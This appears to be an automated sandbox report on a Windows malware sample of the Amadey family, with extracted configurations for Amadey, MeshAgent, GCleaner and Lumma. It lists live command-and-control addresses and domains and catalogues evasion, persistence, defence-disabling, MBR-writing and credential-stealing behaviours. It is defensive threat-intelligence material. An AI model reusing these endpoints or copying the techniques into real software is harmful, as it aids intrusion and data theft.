amadey | 1c85c298f9a4521cd1d585b17c339a251991320addb3ff19c1bee9c5f2d9fb2a

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 18:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

1.8MB
MD5

82ceaed9ec6f91d0651ad7ade1973ce9
SHA1

fc82cea34dededb1a7f0ef922f8417187ccfb0d5
SHA256

1c85c298f9a4521cd1d585b17c339a251991320addb3ff19c1bee9c5f2d9fb2a
SHA512

43df8c92ac3f9bd7319242a2723cd4fca2d7dc7f85185b28b55464643362ee8adca7c11f5a2b433bfd3cc79a1296565c45a799211997ceef13c38a61f9e4d291
SSDEEP

49152:zKkN6kENYRkzHrxq9RZvn/nQvbMvop16TAInOnmiF:zKkNlrMLwRJ/nI0TRi

Score

10^/10

amadey gcleaner lumma meshagent 092155 test123 backdoor bootkit defense_evasion discovery execution exploit loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

meshagent

Version

Botnet

test123

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Extracted

Family

lumma

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://3z7advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects MeshAgent payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000024322-106.dat	family_meshagent
behavioral1/memory/6128-110-0x00007FF671080000-0x00007FF6713F5000-memory.dmp	family_meshagent

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0f48488de8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	192b7f067e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ad20dbfd5e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	343621d628.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4056	powershell.exe
6152	powershell.exe
6484	powershell.exe
4824	powershell.exe
6004	powershell.exe
7824	powershell.exe
8988	powershell.exe
9464	powershell.exe
9856	powershell.exe
4164	powershell.exe
5084	powershell.exe
1468	powershell.exe
13196	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 16 IoCs

flow	pid	Process
30	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
43	316	rapes.exe
309	2176	svchost015.exe
541	4980	svchost015.exe
649	316	rapes.exe
649	316	rapes.exe
649	316	rapes.exe
777	2040	svchost.exe
1135	316	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
560	takeown.exe
5512	icacls.exe

Sets service image path in registry 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\cj684h_5268\ImagePath = "\\??\\C:\\Windows\\Temp\\29Aw78a_5268.sys"	tzutil.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0f48488de8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ad20dbfd5e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	343621d628.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0f48488de8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	60c43db3a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	192b7f067e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ad20dbfd5e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	343621d628.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	60c43db3a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	192b7f067e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
5532	w32tm.exe

Executes dropped EXE 28 IoCs

pid	Process
316	rapes.exe
2180	apple.exe
5428	262.exe
5020	262.exe
3656	f31e7a8e6f.exe
5968	MeshAgent.exe
2176	svchost015.exe
5100	343621d628.exe
4980	svchost015.exe
3420	rapes.exe
4928	RLPhvHg.exe
4900	0f48488de8.exe
6112	60c43db3a1.exe
3800	93bd456d31.exe
1608	7q8Wm5h.exe
4640	192b7f067e.exe
6636	7IIl2eE.exe
3996	Passwords.com
4764	ad20dbfd5e.exe
5232	rapes.exe
5624	FrameworkName.exe
6420	UZPt0hR.exe
1376	TbV75ZR.exe
116	RLPhvHg.exe
7164	MeshAgent.exe
5268	tzutil.exe
5532	w32tm.exe
4492	9sWdA2p.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	0f48488de8.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	192b7f067e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	ad20dbfd5e.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	343621d628.exe
Key opened	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5512	icacls.exe
560	takeown.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0f48488de8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450150101\\0f48488de8.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\60c43db3a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450160101\\60c43db3a1.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\93bd456d31.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450170101\\93bd456d31.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	ad20dbfd5e.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000a000000022bb6-330.dat	autoit_exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\Kernel.Appcore.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\DA23D2554401875493A81DD62582017E44FD92EB	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D70C63BDA4A9B23C15809D54B543AA88C24691E8	MeshAgent.exe
File opened for modification	C:\Windows\System32\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
7156	tasklist.exe
4476	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
5448	random.exe
316	rapes.exe
5100	343621d628.exe
3420	rapes.exe
4900	0f48488de8.exe
4640	192b7f067e.exe
4764	ad20dbfd5e.exe
5232	rapes.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3656 set thread context of 2176	3656	f31e7a8e6f.exe	177
PID 5100 set thread context of 4980	5100	343621d628.exe	202
PID 1376 set thread context of 5472	1376	TbV75ZR.exe	271
PID 5624 set thread context of 5072	5624	FrameworkName.exe	272

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	random.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
692	sc.exe
5972	sc.exe
4800	sc.exe
3080	sc.exe
5724	sc.exe
3200	sc.exe
1088	sc.exe
5056	sc.exe
1740	sc.exe
6136	sc.exe
540	sc.exe
1196	sc.exe
3836	sc.exe
5596	sc.exe
4648	sc.exe
5632	sc.exe
4248	sc.exe
452	sc.exe
2496	sc.exe
2916	sc.exe
1332	sc.exe
3008	sc.exe
2892	sc.exe
3972	sc.exe
5036	sc.exe
5360	sc.exe
5284	sc.exe
3976	sc.exe
5928	sc.exe
232	sc.exe
320	sc.exe
5516	sc.exe
4924	sc.exe
2464	sc.exe
1912	sc.exe
2088	sc.exe
688	sc.exe
816	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	93bd456d31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	343621d628.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	93bd456d31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0f48488de8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	93bd456d31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
